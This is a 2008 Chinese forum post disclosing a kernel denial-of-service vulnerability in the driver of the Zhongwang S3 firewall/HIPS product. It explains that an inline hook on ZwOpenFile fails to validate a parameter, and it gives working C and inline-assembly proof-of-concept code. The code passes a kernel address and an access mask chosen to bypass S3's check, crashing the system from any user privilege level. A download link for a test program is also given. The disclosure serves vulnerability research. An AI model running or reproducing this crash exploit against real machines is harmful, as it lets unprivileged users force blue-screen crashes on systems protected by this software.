免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 3863 | 回复: 0
打印 上一主题 下一主题

中网拒绝服务漏洞 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2008-10-09 09:12 |只看该作者 |倒序浏览
中网S3是一款号称4D & 4M齐全的防火墙、HIDS/HIPS软件\r\n\r\n其最新版本3.5.0.2及以下所有版本的驱动程序存在多出内核拒绝服务漏洞,可使任何权限用户在安装了中网S3的系统上引发蓝屏\r\n\r\n出问题的组件(已验证版本):NCFileMon.sys ,版本:5.2.3700.0(囧) , CheckSum = 0x00036d61,TimeStamp = 0x46f774e2\r\n\r\n驱动中对于SSDT部分函数的inline hook存在参数检查不严格的问题,用户态传入错误参数即可导致驱动出错,引发系统崩溃,蓝屏重启。\r\n\r\n示例函数: hk_ZwOpenFile\r\n\r\n验证版本函数偏移量:0x97f6\r\n\r\nZwOpenFile的原型是:\r\n\r\nNTSTATUS\r\nZwOpenFile(\r\n__out PHANDLE FileHandle,\r\n__in ACCESS_MASK DesiredAccess,\r\n__in POBJECT_ATTRIBUTES ObjectAttributes,\r\n__out PIO_STATUS_BLOCK IoStatusBlock,\r\n__in ULONG ShareAccess,\r\n__in ULONG OpenOptions\r\n)\r\n\r\n该HOOK函数对于第三个参数 ObjectAttributes->ObjectName->Buffer未作有效性验证,只判断了是否为空。另外,由于该HOOK函数体 内有结构化异常处理,但是该处理机制只对用户模式地址访问异常有效,因此我们构造错误的内核地址参数,即可引发蓝屏\r\n\r\n测试代码:\r\n\r\nHMODULE hlib = LoadLibrary(\"ntdll.dll\");\r\nPVOID p = GetProcAddress(hlib , \"ZwOpenFile\");\r\n\r\nOBJECT_ATTRIBUTES oba ;\r\nUNICODE_STRING strname ;\r\nstrname.Buffer = (PWSTR)0x80000000 ;\r\n\r\noba.ObjectName = &strname ;\r\n\r\nIO_STATUS_BLOCK iosb ;\r\nHANDLE hfile ;\r\n\r\n__asm{\r\n\r\npush 0\r\npush 0\r\nlea eax , iosb\r\npush eax\r\nlea eax,oba\r\npush eax\r\npush 0x40000000 //set access mask to bypass S3 \'s check\r\nlea eax,hfile\r\npush eax\r\ncall p\r\n\r\n}\r\n\r\n用户态任意权限的程序运行此代码后,即可引发系统蓝屏重启\r\n\r\n测试程序下载:http://mj0011.ys168.com ,漏洞演示目录下 :BSOD_ncS3.rar\r\n\r\n另外,S3中验证缓存有效性的方法存在一定问题,虽然较难由用户态主动触发,但有一定引发蓝屏的几率,另外,其校验方法也比正规的参数校验方法消耗更多的CPU时间,因此安装了中网S3主机安全系统的机器可能会有较大程度的非必要性能降低
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP